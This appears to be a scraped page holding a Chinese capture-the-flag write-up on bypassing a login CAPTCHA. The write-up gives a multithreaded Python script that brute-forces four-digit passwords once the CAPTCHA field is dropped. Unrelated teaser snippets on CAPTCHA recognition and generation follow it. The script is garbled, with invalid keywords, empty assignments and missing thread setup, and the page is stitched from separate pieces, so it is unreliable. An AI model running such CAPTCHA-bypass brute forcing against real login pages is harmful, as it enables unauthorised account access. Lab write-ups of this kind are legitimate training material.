逗比驗證碼第二期
分值: 150
驗證便失效的驗證碼
登陸一下,用burp抓包
將這個登入請求匯入repeater,經測試,把驗證碼刪掉,可以正常傳送請求。
原因應該是請求頭包含了兩句:
connection: keep-alive
upgrade-insecure-requests: 1
這樣就好辦了,同樣是多執行緒爆破,省去了驗證碼。**如下
import requests, re
import threading
url = ''
login = ''
s = requests.session()
c = s.get(url).content.decode('utf-8')
print (c)
lock=threading.lock()
curtask = 1000
maxtask = 10000
flag = false
right = ''
header =
def thread():
global lock
global curtask
global maxtask
global flag
global right
global header
while not flag: # 當flag為假也就是正確密碼還沒出來時,不斷取任務來完成
lock.acquire() #取任務 #這個過程不能被打斷
mytask = curtask
curtask = curtask + 1
lock.release()
if mytask >= maxtask:#所有任務已經完成就退出
break
data =
c1 = s.post(login, data=data, headers=header).content.decode('utf-8')
print (str(mytask) + ':' + c1)
if 'error' not in c1:
right = str(mytask) + ', ' + c1
flag = true # 當密碼正確時,flag為真
# 多執行緒執行
threadnum = 50
threadlist =
for i in range(threadnum):
for i in threadlist:
i.start()
for i in threadlist:
i.join()
# 最終輸出正確結果
print ('pwd is ' + right)
得到結果:
key是:ljljl789ss33fasvxcvsdf#@sd
驗證碼 簡單驗證碼識別
這裡的驗證碼是內容非常簡單的,結構非常清晰的 這裡的驗證碼是內容非常簡單的,結構非常清晰的 這裡的驗證碼是內容非常簡單的,結構非常清晰的 興之所至之所以說簡單,我覺得是這樣的 抽了五張驗證碼扔進ps,50 透明度,長這樣 只有數字為內容 每張圖的數字都在固定位置 沒有太大的干擾因素 數字字型,形態完...
驗證碼一(驗證碼生成)
根據手機好查詢密碼 return type description code for i 0 i 6 i 4位驗證碼也可以用rand 1000,9999 直接生成 將生成的驗證碼寫入session,備驗證時用 session start session verify num code 建立,定義顏色...
12306驗證碼 驗證碼的架構
最近和眾屌絲一樣,在12306上面刷著春節回家的票。與她大戰無數個回合之後,終於搶到了一張回家的高鐵票,不斷感慨最近人品還不錯。當前,在使用12306的過程中,充滿很多的心酸,念叨了鐵道部的親人很多次 罪過 其中最讓人糾結的一項即是 驗證碼。12306採用驗證碼,無疑是一種很不錯的措施,可以在一定程...